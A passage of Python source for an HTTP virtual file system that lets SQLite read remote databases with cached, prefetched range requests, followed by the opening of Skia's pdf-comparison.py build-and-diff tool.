self.data = data
def add_to_caches(self):
"""Adds self to the caches."""
self.vfsfile.caches.append(self)
def save_cache(self):
"""Saves the cache."""
pass
def delete_caches(self):
"""Deletes old caches."""
current_time = time.time()
self.vfsfile.caches = [
cache for cache in self.vfsfile._get_caches() if (
current_time - cache.time) <= self.vfsfile.cache_ttl]
def get_cache(self, amount, offset):
"""Checks if a cache exists for the data offset, and amount to read,
if so, return the cache, and the start and end range to read
from the cache's data.
Keeps track of forward sequential reads, and backward
sequential reads for the cache.
"""
return_val = [None, None, None, None, None, None, None]
measure_cache_size = self.cache_size is None
if measure_cache_size:
self.cache_size = 0
for c in self.vfsfile._get_caches():
if measure_cache_size:
self.cache_size += c.length_of_data()
start = offset - c._start_offset
end = start + amount
close_to_last_end = (
abs(start - c.running_hit_last_end) <
self.vfsfile.sequential_cache_gap_tolerance)
close_to_last_start = (
abs(c.running_hit_last_start - end) <
self.vfsfile.sequential_cache_gap_tolerance)
small_read = self.vfsfile.sequential_cache_default_read * 2 # noqa
if start >= 0 and c.length_of_data() >= end:
# Cache hit
# Keeps track of the total running
# amount of sequentially read
# bytes on the cache, and the direction
if start >= c.running_hit_last_end:
# Forward sequential
c.running_forward_hit_amount = \
c.running_forward_hit_amount + amount
if (c.running_forward_hit_amount !=
c.running_backward_hit_amount):
c.running_hit_direction = max(
(c.running_forward_hit_amount, 1),
(c.running_backward_hit_amount, -1))[1]
else:
c.running_hit_direction = 1
if end <= c.running_hit_last_start:
# Backward sequential
c.running_backward_hit_amount = \
c.running_backward_hit_amount + amount
if (c.running_forward_hit_amount !=
c.running_backward_hit_amount):
c.running_hit_direction = max(
(c.running_forward_hit_amount, 1),
(c.running_backward_hit_amount, -1))[1]
else:
c.running_hit_direction = -1
c.running_hit_amount = max(
c.running_forward_hit_amount,
c.running_backward_hit_amount)
c.running_hit_last_start = start
c.running_hit_last_end = end
c.time = time.time()
return_val = (
c.running_hit_amount,
c.running_hit_direction,
c.running_forward_hit_amount,
c.running_backward_hit_amount,
start,
end,
c
)
c.save_cache()
elif (
(return_val[0] is None or (isinstance(return_val, list) and
c.running_hit_amount > return_val[0])) and # noqa
start >= c.running_hit_last_end and
close_to_last_end
):
# Complete cache miss, but it is still a close forward
# sequential read of the current cache, return
# the running sequentially read byte information
# so it can be added to the next cache
return_val[1] = 1
if return_val[1] != c.running_hit_direction:
return_val[0] = small_read
return_val[2] = small_read
return_val[3] = small_read
else:
return_val[0] = c.running_hit_amount
return_val[2] = c.running_forward_hit_amount
return_val[3] = c.running_backward_hit_amount
elif (
(return_val[0] is None or (isinstance(return_val, list) and
c.running_hit_amount > return_val[0])) and # noqa
end <= c.running_hit_last_start and
close_to_last_start
):
# Partial cache miss, but it is still a close backward
# sequential read of the current cache, return
# the running sequentially read byte information
# so it can be added to the next cache
return_val[1] = -1
if return_val[1] != c.running_hit_direction:
return_val[0] = small_read
return_val[2] = small_read
return_val[3] = small_read
else:
return_val[0] = c.running_hit_amount
return_val[2] = c.running_forward_hit_amount
return_val[3] = c.running_backward_hit_amount
return return_val
def write_data(self, start_offset, data, amount, offset):
"""Writes data fetched to the network cache and
returns only the amount requested back."""
# Writes the entire data fetched to the cache
if self.vfsfile.should_cache:
# Uses itself as a cache object
self._start_offset = start_offset
self.set_data(data)
if self.vfsfile.trace_log:
print("[HTTPVFS] Cache Size: %d bytes" % (self.cache_size,))
# Purge old caches
current_time = time.time()
if ((current_time -
self.vfsfile.last_cache_purge) >
self.vfsfile.ttl_purge_interval):
if self.vfsfile.trace_log:
print("[HTTPVFS] Purging expired caches...")
self.vfsfile.last_cache_purge = current_time
self.delete_caches()
# Adds itself to the cache array, so the next read
# succeed
self.add_to_caches()
return data[offset -
start_offset: (offset - start_offset) + amount]
def _prefetch_in_background(
self,
_prefetch_in_background,
amount,
offset,
sequential):
"""Prefetches data from the network to the cache."""
# Store the extra data fetched back in the network cache
if self.vfsfile.trace_log:
print(
"[HTTPVFS] Prefetching in background @ %d + %d" %
(offset, amount))
try:
if sequential:
data = _prefetch_in_background(
self.vfsfile.SEQUENTIAL, amount, offset)
else:
data = _prefetch_in_background(
self.vfsfile.RANDOM_ACCESS, amount, offset)
cache = HTTPVFSFileCache(self.vfsfile)
if data:
cache.write_data(offset, data, 0, offset)
if self.vfsfile.trace_log:
print(
"[HTTPVFS] Finished prefetching @ %d + %d" %
(offset, amount))
else:
if self.vfsfile.trace_log:
print(
"[HTTPVFS] Prefetching terminated early @ %d + %d" %
(offset, amount))
except BaseException:
if self.vfsfile.trace_log:
print(
"[HTTPVFS] Prefetching error @ %d + %d" %
(offset, amount))
pass
def prefetch_in_background(
self,
_prefetch_in_background,
amount,
offset,
sequential=False):
"""Prefetches data from the network to the cache
in the background."""
if self.vfsfile.trace_log:
if sequential:
print(
"[HTTPVFS] Sequential prefetching "
"request @ %d + %d" %
(offset, amount))
else:
print(
"[HTTPVFS] Random access prefetching "
"request @ %d + %d" %
(offset, amount))
self.vfsfile.prefetch_threads = [
t for t in self.vfsfile.prefetch_threads if t.is_alive()]
if (len(self.vfsfile.prefetch_threads) <=
self.vfsfile.prefetch_thread_limit or sequential):
prefetch_thread = threading.Thread(
target=self._prefetch_in_background,
args=(
_prefetch_in_background,
amount,
offset,
sequential),
name='HTTPVFSFileCache' +
(
'Sequential' if sequential else '') +
'PrefetchThread@' +
str(offset) +
'+' +
str(amount))
prefetch_thread.daemon = True
if sequential:
if self.vfsfile.sequential_prefetch_thread:
self.vfsfile.sequential_prefetch_thread.do_run = False
self.vfsfile.sequential_prefetch_thread = prefetch_thread
else:
self.vfsfile.prefetch_threads.append(prefetch_thread)
prefetch_thread.start()
else:
if self.vfsfile.trace_log:
print(
"[HTTPVFS] Ignoring prefetch request @ %d + %d, "
"reached prefetch thread limit" %
(offset, amount))
def read_data(self, amount, offset, _prefetch_in_background=None):
"""Reads data from the network cache and
returns only the amount requested back or
Returns None if there is a cache miss, and prefetches more data
into the cache using _prefetch_in_background(amount, offset)
if it detects a non-sequential access pattern in the
cache misses."""
# Don't do anything if caching is disabled
if not self.vfsfile.should_cache:
return None
# Find the closest cache match
current_time = time.time()
(
running_hit_amount,
running_hit_direction,
running_forward_hit_amount,
running_backward_hit_amount,
start,
end,
cache
) = self.get_cache(amount, offset)
if running_hit_amount is not None:
if (self.vfsfile.sequential_cache_exponential_read_growth and
cache is None):
# Reached a cache miss, but still sequentially reading
# If exponential sequential cache reads are on, double the
# read size
running_hit_amount = min(
running_hit_amount * 2,
self.vfsfile.sequential_cache_max_read)
running_forward_hit_amount = min(
running_forward_hit_amount * 2,
self.vfsfile.sequential_cache_max_read)
running_backward_hit_amount = min(
running_backward_hit_amount * 2,
self.vfsfile.sequential_cache_max_read)
self.running_forward_hit_amount = running_forward_hit_amount
self.running_backward_hit_amount = running_backward_hit_amount
self.running_hit_amount = running_hit_amount
self.running_hit_direction = running_hit_direction
self.vfsfile.running_hit_direction = running_hit_direction
if cache is None:
self.vfsfile.cache_amount = min(
running_hit_amount,
self.vfsfile.sequential_cache_max_read
)
self.save_cache()
else:
if cache is None:
# Cache miss, and not a sequential read, only read a small
self.vfsfile.cache_amount = \
self.vfsfile.sequential_cache_default_read
self.save_cache()
if cache:
data = cache.get_data()[start:end]
# Adjust the cache amount for the next read
self.vfsfile.running_hit_direction = cache.running_hit_direction
self.vfsfile.cache_amount = min(
cache.running_hit_amount,
self.vfsfile.sequential_cache_max_read)
return data
elif self.vfsfile.random_access_cache_prefetch:
# Keep track of regions of the file where there are cache
# misses. Each "hit" on a file is analyzed and clustered into
# "groups" of hits, sequential "hits" are ignored.
# Purge old hit patterns
if (current_time - self.vfsfile.last_random_access_hit_tracker_purge) > self.vfsfile.ttl_purge_interval: # noqa
if self.vfsfile.trace_log:
print("[HTTPVFS] Purging expired hit trackers...")
self.vfsfile.last_random_access_hit_tracker_purge = \
current_time
self.vfsfile.hit_pattern = [hit for hit in self.vfsfile.hit_pattern if ((current_time - hit[4]) <= self.vfsfile.random_access_hit_tracker_ttl)] # noqa
# Find the closest cluster of hits for the current miss
hit_index = bisect.bisect_left(
KeyList(
self.vfsfile.hit_pattern,
key=lambda x: x[0]),
offset)
hit_index_area = []
if hit_index - 1 >= 0:
hit_index_area.append(hit_index - 1)
if hit_index < len(self.vfsfile.hit_pattern):
hit_index_area.append(hit_index)
if len(hit_index_area) > 0:
hit_index = min(
hit_index_area, key=lambda x: abs(
self.vfsfile.hit_pattern[x][0] - offset))
# Add the current miss to the closest cluster, and evaluate
# if it should be prefetched
hit = self.vfsfile.hit_pattern[hit_index]
dist = abs(hit[0] - offset)
if dist <= self.vfsfile.random_access_cache_range:
self.vfsfile.hit_pattern[hit_index] = [
(offset + hit[0]) / 2.0,
(dist + hit[1]) / 2.0 if dist > hit[1] else hit[1],
hit[2] + 1 if offset > hit[0] else hit[2],
hit[3] + 1 if offset < hit[0] else hit[3],
current_time]
hit = self.vfsfile.hit_pattern[hit_index]
if hit[2] >= hit[3] * 2 and (hit[2] + hit[3]) > 8:
# Looks like a forward sequential read pattern,
# ignore
del self.vfsfile.hit_pattern[hit_index]
elif hit[3] >= hit[2] * 2 and (hit[2] + hit[3]) > 8:
# Looks like a backward sequential read pattern,
# ignore
del self.vfsfile.hit_pattern[hit_index]
elif (_prefetch_in_background and (hit[2] > 2) and
(hit[3] > 2) and (hit[2] + hit[3]) > 30):
# If a certain region of the file, is being "hit"
# frequently for smaall chunks of data within a
# larger range, prefetch that region of the file
# and data surrounding it to prevent future
# cache misses
self.prefetch_in_background(
_prefetch_in_background, int(
hit[1] * 2), max(int(hit[0] - hit[1]), 0)
)
return None
# mean, range, positive direction, negative direction, time
self.vfsfile.hit_pattern.insert(
hit_index, [offset, 0, 0, 0, current_time])
class HTTPVFSFileMemoryMappedCache(HTTPVFSFileCache):
""" This cache is like HTTPVFSFileCache
except all cache data is memory mapped
"""
def __init__(self, vfsfile, cache_dir_path, cache_key=None):
self.cache_dir_path = cache_dir_path
self.cache_key = cache_key
HTTPVFSFileCache.__init__(self, vfsfile)
if self.cache_key and self.cache_key != '.DS_Store':
cache_key_split = cache_key.split('.')[0].split('_')
self._start_offset = int(cache_key_split[0])
self.running_hit_direction = int(cache_key_split[1])
self.running_hit_last_start = (
float(
cache_key_split[2])
if cache_key_split[2] == 'inf' else int(
cache_key_split[2]))
self.running_hit_last_end = int(cache_key_split[3])
self.running_forward_hit_amount = int(cache_key_split[4])
self.running_backward_hit_amount = int(cache_key_split[5])
self.running_hit_amount = int(cache_key_split[6])
self.time = float(cache_key_split[7])
self.id = int(cache_key_split[8])
else:
self.cache_key = self.create_key()
def length_of_data(self):
"""Returns the length of the cached data."""
try:
return os.path.getsize(os.path.join(self.cache_dir_path,
self.cache_key))
except BaseException:
return 0
def add_to_mmaps(self, new, mm):
"""Adds a new mmap, evicting old mmaps if the maximum has been
reached."""
while (len(self.vfsfile.cache_mmaps_heap) >=
self.vfsfile.mmap_max_files):
_, evict = heapq.heappop(self.vfsfile.cache_mmaps_heap)
try:
evict_mm = self.vfsfile.cache_mmaps[evict]
except BaseException:
pass
try:
evict_mm.close()
except BaseException:
pass
try:
del self.vfsfile.cache_mmaps[evict]
except BaseException:
pass
heapq.heappush(self.vfsfile.cache_mmaps_heap,
(time.time(), new))
self.vfsfile.cache_mmaps[new] = mm
def get_mmap(self, create=True):
"""Gets the mmap for a key, opening a mmap to the file
if a mmap doesn't exist, creating a file, then opening a mmap
to it if the file doesn't exist."""
if (self.cache_key not in self.vfsfile.cache_mmaps and create):
joined = os.path.join(self.cache_dir_path,
self.cache_key)
if os.path.exists(os.path.join(self.cache_dir_path,
self.cache_key)):
f = open(joined, "r+b")
mm = mmap.mmap(f.fileno(), self.length_of_data())
f.close()
else:
f = open(joined, "w+b")
f.write("\0".encode('utf-8'))
f.flush()
os.fsync(f.fileno())
mm = mmap.mmap(f.fileno(), 1)
f.close()
self.add_to_mmaps(self.cache_key, mm)
try:
return self.vfsfile.cache_mmaps[self.cache_key]
except BaseException as e:
if create:
return e
else:
return None
def get_data(self):
"""Returns the cached data."""
return self.get_mmap()
def set_data(self, data):
"""Sets the cached data."""
self.save_cache()
mm = self.get_mmap(create=False)
try:
del self.vfsfile.cache_mmaps[self.cache_key]
except BaseException:
pass
try:
mm.close()
except BaseException:
pass
f = open(os.path.join(self.cache_dir_path,
self.cache_key), "w+b")
f.write(data)
f.flush()
os.fsync(f.fileno())
mm = None
mm = mmap.mmap(f.fileno(), len(data))
f.close()
self.vfsfile.cache_mmaps[self.cache_key] = mm
def create_key(self):
"""Serializes instance variables into a key."""
return '_'.join([
str(self._start_offset),
str(self.running_hit_direction),
str(self.running_hit_last_start),
str(self.running_hit_last_end),
str(self.running_forward_hit_amount),
str(self.running_backward_hit_amount),
str(self.running_hit_amount),
str(int(self.time)),
str(self.id),
]) + '.supersqlmmap'
def add_to_caches(self):
"""Adds self to the caches."""
pass
def save_cache(self):
"""Saves the cache."""
new_key = self.create_key()
old = os.path.join(self.cache_dir_path,
self.cache_key)
new = os.path.join(self.cache_dir_path, new_key)
try:
os.rename(old, new)
except BaseException:
pass
try:
mm = self.vfsfile.cache_mmaps[self.cache_key]
del self.vfsfile.cache_mmaps[self.cache_key]
self.add_to_mmaps(new_key, mm)
except BaseException:
pass
self.cache_key = new_key
def delete_caches(self):
"""Deletes old caches."""
current_time = time.time()
for cache in self.vfsfile._get_caches():
if cache.id == self.id:
continue
if (current_time - cache.time) > self.vfsfile.cache_ttl:
try:
mmap = cache.get_mmap(create=False)
except BaseException:
pass
try:
del self.vfsfile.cache_mmaps[self.cache_key]
except BaseException:
pass
try:
mmap.close()
except BaseException:
pass
try:
os.remove(os.path.join(cache.cache_dir_path,
cache.cache_key))
except BaseException:
pass
class HTTPVFSFile(apsw.VFSFile):
""" This acts as the representation of a single file on
the HTTP virtual file system.
"""
def __init__(self, inheritfromvfsname, name, flags, vfs, options=None):
# Constants
self.RANDOM_ACCESS = 0
self.SEQUENTIAL = 1
# Cache + Network configuration
defaults = {
'should_cache': True,
'network_retry_delay': 10,
'max_network_retries': 10,
'sequential_cache_default_read': 4096 * 2,
'sequential_cache_gap_tolerance': 10 * (1024 ** 2),
'sequential_cache_max_read': 20 * (1024 ** 2),
'sequential_cache_exponential_read_growth': True,
'prefetch_thread_limit': 3,
'sequential_cache_prefetch': True,
'random_access_cache_prefetch': True,
'random_access_cache_range': 100 * (1024 ** 2),
'random_access_hit_tracker_ttl': 60,
'cache_ttl': 60,
'ttl_purge_interval': 5,
'use_mmap': False,
'mmap_max_files': 10,
'temp_dir': tempfile.gettempdir(),
'trace_log': False,
}
defaults.update(options or {})
for k, v in defaults.items():
setattr(self, k, v)
self.max_network_retries = max(self.max_network_retries, 4)
if not self.should_cache:
self.sequential_cache_prefetch = False
self.random_access_cache_prefetch = False
self.sequential_cache_default_read = 0
self.cache_amount = 0
# Cache initialization
self.caches = []
self.cache_mmaps_heap = []
self.cache_mmaps = {}
self.cache_amount = self.sequential_cache_default_read
self.last_cache_purge = 0
self.last_random_access_hit_tracker_purge = 0
# Prefetch Connections
self.pconn_terminated = {}
self.pconn_count = {}
self.pconn = {}
# Connection lock
self.conn_lock = threading.RLock()
# State to keep tracking adjusting the predictive network cache
# window
self.running_hit_direction = 0
self.hit_pattern = []
# Keep track of threads
self.prefetch_threads = []
self.sequential_prefetch_thread = None
# Initialization
self.vfs = vfs
self.length = 99999999999999999
self.name = name
self.tries = 1
self.url = self.name.filename()
url_cis = self.url.lower()
try:
self.url = self.url[url_cis.index('http://'):]
self.parsed_url = urlparse(self.url)
self._prepare_connection()
if self.random_access_cache_prefetch:
self._prepare_prefetch_connection(self.RANDOM_ACCESS)
if self.sequential_cache_prefetch:
self._prepare_prefetch_connection(self.SEQUENTIAL)
except BaseException:
try:
self.url = self.url[url_cis.index('https://'):]
self.parsed_url = urlparse(self.url)
self._prepare_connection()
if self.random_access_cache_prefetch:
self._prepare_prefetch_connection(self.RANDOM_ACCESS)
if self.sequential_cache_prefetch:
self._prepare_prefetch_connection(self.SEQUENTIAL)
except BaseException:
raise RuntimeError("Invalid URL.")
self.cache_dir = (
hashlib.md5(
self.url.encode('utf-8')).hexdigest() +
'_supersqlmmap')
self.cache_dir_path = os.path.join(self.temp_dir, self.cache_dir)
try:
os.makedirs(self.cache_dir_path + '/')
except OSError:
pass
# Prepare the VFS
apsw.VFSFile.__init__(self, inheritfromvfsname, os.devnull, flags)
def _new_connection(self):
"""Creates an HTTP connection"""
if self.parsed_url.scheme.lower() == 'http':
return http.client.HTTPConnection(
self.parsed_url.netloc, timeout=60)
else:
return http.client.HTTPSConnection(
self.parsed_url.netloc, timeout=60)
def _prepare_connection(self, new=True):
"""Prepares a new HTTP connection"""
try:
self.conn.close()
except BaseException:
pass
if new:
self.conn = self._new_connection()
def _prepare_prefetch_connection(self, n, new=True):
"""Prepares a new HTTP connection"""
try:
self.pconn_terminated[n] = True
while self.pconn_count[n] > 0:
sleep(1)
self.pconn[n].close()
except BaseException:
pass
if new:
self.pconn[n] = self._new_connection()
self.pconn_count[n] = 0
self.pconn_terminated[n] = False
def _wait_on_prefetch_connection(self, n):
self.pconn_count[n] += 1
def _unwait_on_prefetch_connection(self, n):
self.pconn_count[n] -= 1
def _network_error(self, e, i):
"""Handles an network error"""
if self.trace_log:
print("[HTTPVFS] Network Error: %s" % (str(e),))
if i + 1 >= self.tries:
raise RuntimeError(
"Could not reach the server at: '" + self.url + "'")
else:
if self.trace_log:
print("[HTTPVFS] Refreshing network connection...")
self.conn_lock.acquire()
self._prepare_connection()
self.conn_lock.release()
if i > 2:
if self.trace_log:
print("[HTTPVFS] Waiting before retrying...")
sleep(self.network_retry_delay)
if self.trace_log:
print("[HTTPVFS] Retrying...")
def _prefetch_in_background(self, n, amount, offset):
headers = {
'Range': "bytes=" + str(max(offset, 0)) + "-" + str(
min((offset + amount) - 1, self.length) # noqa
),
}
self._wait_on_prefetch_connection(n)
while not self.pconn_terminated[n]:
try:
self.pconn[n].request(
"GET", self.parsed_url.path, headers=headers)
break
except CannotSendRequest:
sleep(1)
while not self.pconn_terminated[n]:
try:
res = self.pconn[n].getresponse()
break
except ResponseNotReady:
# Since we are sharing the connection wait for this to be
# ready
sleep(1)
if self.pconn_terminated[n]:
self._unwait_on_prefetch_connection(n)
return
else:
self._unwait_on_prefetch_connection(n)
if not(res.status >= 200 and res.status <= 299):
# Check for a valid status from the server
return
data = bytearray(res.length)
i = 0
for piece in iter(lambda: res.read(1024), bytes('')):
if not getattr(threading.currentThread(), "do_run", True):
break
data[i:i + len(piece)] = piece
i = i + len(piece)
else:
return bytes(data)
# Leaving the thread early, without
# reading all of the data this will
# make the connection unusable, refresh it
self._prepare_prefetch_connection(n)
def _get_caches(self):
"""Gets all of the caches."""
if self.use_mmap:
return [
HTTPVFSFileMemoryMappedCache(
self,
self.cache_dir_path,
cache_key) for cache_key in os.listdir(
self.cache_dir_path)]
else:
return self.caches
def xRead(self, amount, offset): # noqa: N802
"""Intercepts SQLite's file read command"""
if self.trace_log:
print("[HTTPVFS] Read request @ %d + %d" % (offset, amount))
for i in range(self.tries):
try:
# Try to see if we have already read the data
# and cached it
if self.use_mmap:
cache = HTTPVFSFileMemoryMappedCache(
self, self.cache_dir_path)
else:
cache = HTTPVFSFileCache(self)
data = cache.read_data(
amount, offset, self._prefetch_in_background)
if data is None:
if self.trace_log and self.should_cache:
print(
"[HTTPVFS] Cache miss for request @ %d + %d" %
(offset, amount))
# Fire off a network request with the range of bytes
# (potentially predicatively reading a larger amount
# and storing it in the network cache)
if self.running_hit_direction >= 0:
# Read the amount requested + extra
# in the forward sequential direction
# to save in the cache
start = max(offset, 0)
end = min(
(offset + max(self.cache_amount, amount)) - 1,
self.length)
else:
# Read the amount requested + extra
# in the backward sequential direction
# to save in the cache
start = max(offset - self.cache_amount, 0)
end = min((offset + amount) - 1, self.length)
# Cancel any previous sequential prefetches, the current
# chunk data of data was requested too fast for any
# background prefetches to load the cache, must
# request it synchronously
if self.sequential_prefetch_thread:
self.sequential_prefetch_thread.do_run = False
# Synchronously request the current chunk from the
# network
headers = {
'Range': "bytes=" + str(start) + "-" + str(end),
}
self.conn_lock.acquire()
self.conn.request(
"GET", self.parsed_url.path, headers=headers)
res = self.conn.getresponse()
if not(res.status >= 200 and res.status <= 299):
# Check for a valid status from the server
raise RuntimeError(
"HTTP Status Code Error from Server")
if self.trace_log:
print(
"[HTTPVFS] Fetching @ %d + %d for "
"request @ %d + %d" %
(start, 1 + end - start, offset, amount))
data = res.read()
self.conn_lock.release()
if self.trace_log:
print(
"[HTTPVFS] Done fetching @ %d + %d for "
"request @ %d + %d" %
(start, 1 + end - start, offset, amount))
# Store the extra data fetched back in the network cache
data = cache.write_data(start, data, amount, offset)
# Prefetch the next sequential chunk of data in the
# background
if self.sequential_cache_prefetch and self.should_cache:
if self.running_hit_direction >= 0:
cache.prefetch_in_background(
self._prefetch_in_background,
self.cache_amount,
start + self.cache_amount * 1,
sequential=True)
else:
cache.prefetch_in_background(
self._prefetch_in_background,
self.cache_amount,
start - self.cache_amount * 1,
sequential=True)
else:
if self.trace_log:
print(
"[HTTPVFS] Cache hit for request @ %d + %d" %
(offset, amount))
# Return the data to SQLite
return data
except BaseException as e:
try:
self.conn_lock.release()
except BaseException:
pass
# Handle a network error
self._network_error(e, i)
def xWrite(self, data, offset): # noqa: N802
"""Intercepts SQLite's file write command"""
# Can't write to an HTTP server, ignore
pass
def xFileSize(self): # noqa: N802
"""Intercepts SQLite's file size command"""
for i in range(self.tries):
try:
# Fire of a content-length request to the server
self.conn_lock.acquire()
self.conn.request("GET", self.parsed_url.path)
res = self.conn.getresponse()
self.tries = self.max_network_retries
self.length = res.length
self._prepare_connection()
self.conn_lock.release()
return self.length
except BaseException as e:
try:
self.conn_lock.release()
except BaseException:
pass
# Handle a network error
self._network_error(e, i)
def xClose(self): # noqa: N802
"""Intercepts SQLite's file close command"""
ident = self.name.filename()
with self.vfs.files_lock:
if ident in self.vfs.files:
if self.vfs.files[ident][0] <= 1:
for t in self.prefetch_threads:
t.do_run = False
if self.sequential_prefetch_thread:
self.sequential_prefetch_thread.do_run = False
self._prepare_prefetch_connection(
self.RANDOM_ACCESS, new=False)
self._prepare_prefetch_connection(
self.SEQUENTIAL, new=False)
self._prepare_connection(new=False)
del self.vfs.files[ident]
while len(self.cache_mmaps_heap) >= 0:
_, evict = heapq.heappop(self.cache_mmaps_heap)
try:
evict_mm = self.cache_mmaps[evict]
except BaseException:
pass
try:
evict_mm.close()
except BaseException:
pass
try:
del self.cache_mmaps[evict]
except BaseException:
pass
else:
self.vfs.files[ident] = (
self.vfs.files[ident][0] - 1,
self.vfs.files[ident][1])
class HTTPVFS(apsw.VFS):
""" This acts as the representation of a filesystem that
proxies to HTTP requests so that SQLite can connect
to HTTP URLs.
"""
def __init__(self, vfsname="http", basevfs="", options=None):
self.vfsname = vfsname
self.basevfs = basevfs
self.options = options or {}
apsw.VFS.__init__(self, self.vfsname, self.basevfs)
self.files = {}
self.files_lock = threading.RLock()
def xOpen(self, name, flags=apsw.SQLITE_OPEN_MAIN_DB): # noqa: N802
"""Intercepts SQLite's file open command"""
flags[1] = flags[1] | apsw.SQLITE_OPEN_READONLY
if flags[0] & apsw.SQLITE_OPEN_MAIN_DB:
ident = name.filename()
with self.files_lock:
if ident not in self.files:
self.files[ident] = (1, HTTPVFSFile(
self.basevfs, name, flags, self, self.options))
else:
self.files[ident] = (
self.files[ident][0] + 1, self.files[ident][1])
return self.files[ident][1]
else:
return None
|
pdf-comparison.py
|
#!/usr/bin/env python
# Copyright 2019 Google LLC.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''
This tool compares the PDF output of Skia's DM tool of two commits.
It relies on pdfium_test being in the PATH. To build:
mkdir -p ~/src/pdfium
cd ~/src/pdfium
gclient config --unmanaged https://pdfium.googlesource.com/pdfium.git
gclient sync
cd pdfium
gn gen out/default --args='pdf_enable_xfa=false pdf_enable_v8=false pdf_is_standalone=true'
ninja -C out/default pdfium_test
cp out/default/pdfium_test ~/bin/
'''
import os
import re
import shutil
import subprocess
import sys
import tempfile
import threading
EXTRA_GN_ARGS = os.environ.get('PDF_COMPARISON_GN_ARGS', '')
REFERENCE_BACKEND = 'gl' if 'PDF_COMPARISON_NOGPU' not in os.environ else '8888'
DPI = float(os.environ.get('PDF_COMPARISON_DPI', 72))
PDF_CONFIG = 'pdf' if 'PDF_COMPARISON_300DPI' not in os.environ else 'pdf300'
BAD_TESTS = [
'image-cacherator-from-picture',
'image-cacherator-from-raster',
'mixershader',
'shadermaskfilter_image',
'tilemode_decal',
]
NINJA = 'ninja'
PDFIUM_TEST = 'pdfium_test'
NUM_THREADS = int(os.environ.get('PDF_COMPARISON_THREADS', 40))
SOURCES = ['gm']
def test_exe(cmd):
with open(os.devnull, 'w') as o:
try:
subprocess.call([cmd], stdout=o, stderr=o)
except OSError:
return False
return True
def print_cmd(cmd, o):
m = re.compile('[^A-Za-z0-9_./-]')
o.write('+ ')
for c in cmd:
if m.search(c) is not None:
o.write(repr(c) + ' ')
else:
o.write(c + ' ')
o.write('\n')
o.flush()
def check_call(cmd, **kwargs):
print_cmd(cmd, sys.stdout)
return subprocess.check_call(cmd, **kwargs)
def check_output(cmd, **kwargs):
print_cmd(cmd, sys.stdout)
return subprocess.check_output(cmd, **kwargs)
def remove(*paths):
for path in paths:
os.remove(path)
def timeout(deadline, cmd):
#print_cmd(cmd, sys.stdout)
with open(os.devnull, 'w') as o:
proc = subprocess.Popen(cmd, stdout=o, stderr=subprocess.STDOUT)
timer = threading.Timer(deadline, proc.terminate)
timer.start()
proc.wait()
timer.cancel()
return proc.returncode
def is_same(path1, path2):
if not os.path.isfile(path1) or not os.path.isfile(path2):
return os.path.isfile(path1) == os.path.isfile(path2)
with open(path1, 'rb') as f1:
with open(path2, 'rb') as f2:
while True:
c1, c2 = f1.read(4096), f2.read(4096)
if c1 != c2:
return False
if not c1:
return True
def getfilesoftype(directory, ending):
for dirpath, _, filenames in os.walk(directory):
rp = os.path.normpath(os.path.relpath(dirpath, directory))
for f in filenames:
if f.endswith(ending):
yield os.path.join(rp, f)
def get_common_paths(dirs, ext):
return sorted(list(
set.intersection(*(set(getfilesoftype(d, ext)) for d in dirs))))
def printable_path(d):
if 'TMPDIR' in os.environ:
return d.replace(os.path.normpath(os.environ['TMPDIR']) + '/', '$TMPDIR/')
return d
def spawn(cmd):
with open(os.devnull, 'w') as o:
subprocess.Popen(cmd, stdout=o, stderr=o)
def sysopen(arg):
plat = sys.platform
if plat.startswith('darwin'):
spawn(["open", arg])
elif plat.startswith('win'):
# pylint: disable=no-member
os.startfile(arg)
else:
spawn(["xdg-open", arg])
HTML_HEAD = '''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>DIFF</title>
<style>
body{
background-size:16px 16px;
background-color:rgb(230,230,230);
background-image:
linear-gradient(45deg,rgba(255,255,255,.2) 25%,transparent 25%,transparent 50%,
rgba(255,255,255,.2) 50%,rgba(255,255,255,.2) 75%,transparent 75%,transparent)}
div.r{position:relative;left:0;top:0}
table{table-layout:fixed;width:100%}
img.s{max-width:100%;max-height:320;left:0;top:0}
img.b{position:absolute;mix-blend-mode:difference}
</style>
<script>
function r(c,e,n,g){
t=document.getElementById("t");
function ce(t){return document.createElement(t);}
function ct(n){return document.createTextNode(n);}
function ac(u,v){u.appendChild(v);}
function cn(u,v){u.className=v;}
function it(s){ td=ce("td"); a=ce("a"); a.href=s; img=ce("img"); img.src=s;
cn(img,"s"); ac(a,img); ac(td,a); return td; }
tr=ce("tr"); td=ce("td"); td.colSpan="4"; ac(td, ct(n)); ac(tr,td);
ac(t,tr); tr=ce("tr"); td=ce("td"); dv=ce("div"); cn(dv,"r");
img=ce("img"); img.src=c; cn(img,"s"); ac(dv,img); img=ce("img");
img.src=e; cn(img,"s b"); ac(dv,img); ac(td,dv); ac(tr,td);
ac(tr,it(c)); ac(tr,it(e)); ac(tr,it(g)); ac(t,tr); }
document.addEventListener('DOMContentLoaded',function(){
'''
HTML_TAIL = '''];
for(i=0;i<z.length;i++){
r(c+z[i][0],e+z[i][0],z[i][2],c+z[i][1]);}},false);
</script></head><body><table id="t">
<tr><th>BEFORE-AFTER DIFF</th>
<th>BEFORE</th><th>AFTER</th>
<th>REFERENCE</th></tr>
</table></body></html>'''
def shard(fn, arglist):
jobs = [[arg for j, arg in enumerate(arglist) if j % NUM_THREADS == i]
for i in range(NUM_THREADS)]
results = []
def do_shard(*args):
for arg in args:
results.append(fn(arg))
thread_list = []
for job in jobs:
t = threading.Thread(target=do_shard, args=job)
t.start()
thread_list += [t]
for t in thread_list:
t.join()
return results
def shardsum(fn, arglist):
'return the number of True results returned by fn(arg) for arg in arglist.'
return sum(1 for result in shard(fn, arglist) if result)
def checkout_worktree(checkoutable):
directory = os.path.join(tempfile.gettempdir(), 'skpdf_control_tree')
commit = check_output(['git', 'rev-parse', checkoutable]).strip()
if os.path.isdir(directory):
try:
check_call(['git', 'checkout', commit], cwd=directory)
return directory
except subprocess.CalledProcessError:
shutil.rmtree(directory)
check_call(['git', 'worktree', 'add', '-f', directory, commit])
return directory
def build_skia(directory, executable):
args = ('--args=is_debug=false'
' extra_cflags=["-DSK_PDF_LESS_COMPRESSION",'
' "-DSK_PDF_BASE85_BINARY"] ')
if test_exe('ccache'):
args += ' cc_wrapper="ccache"'
args += EXTRA_GN_ARGS
build_dir = directory + '/out/pdftest'
check_call([sys.executable, 'bin/sync'], cwd=directory)
check_call([directory + '/bin/gn', 'gen', 'out/pdftest', args],
cwd=directory)
check_call([NINJA, executable], cwd=build_dir)
return os.path.join(build_dir, executable)
